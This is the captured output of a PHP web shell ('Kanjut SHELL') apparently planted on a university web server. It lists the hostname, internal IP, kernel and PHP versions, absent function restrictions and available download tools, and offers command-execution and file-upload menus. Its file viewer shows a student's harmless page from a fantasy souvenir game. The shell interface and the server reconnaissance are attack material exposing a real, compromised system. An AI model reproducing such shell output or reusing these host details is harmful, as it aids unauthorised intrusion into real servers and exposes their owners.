Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.133.151.90
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/kvtillotson/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/kvtillotson/public_html/projectAreaDesert.php
<!-- projectAreaDesert.php - Kristin Tillotson -->

<?php   session_start();
        $char = $_SESSION['char'];
        if($char == "")
                print "<A HREF=projectCharacterSelect.php>Log In</A>";
        else
                print "<A HREF=projectCharacterModify.php> $char </A> |
        <A HREF=projectLogout.php> Logout</A>";
?>

<CENTER> <A HREF=project.php> Homepage</A> |
<A HREF=projectAreas.php> Areas</A> |
<A HREF=projectCharacterDisplay.php> Characters</A><HR>
<H2><Font color=green> Souvenirs: A Fantasy Exploration Game </font></H2><HR>

<form action=projectItem.php method=post>
The desert is hot, dry, sandy, and very large.

<P> There is a lot of sand, <input type=radio name=item value=sand>
a few tiny prickly cactuses, <input type=radio name=item value=cactus>
<BR> one not quite so tiny cactus with a pink flower, <input type=radio name=item value="cactus flower">
<BR> a few rocks, <input type=radio name=item value=rock>
and a mostly buried golden glint. <input type=radio name=item value="gold ring">
<BR> There is also a sunbathing lizard. <input type=radio name=item value=lizard>

<P>
Examine a souvenir?
<input type=submit value=Yes>
</form>

Stv3n404 - 2023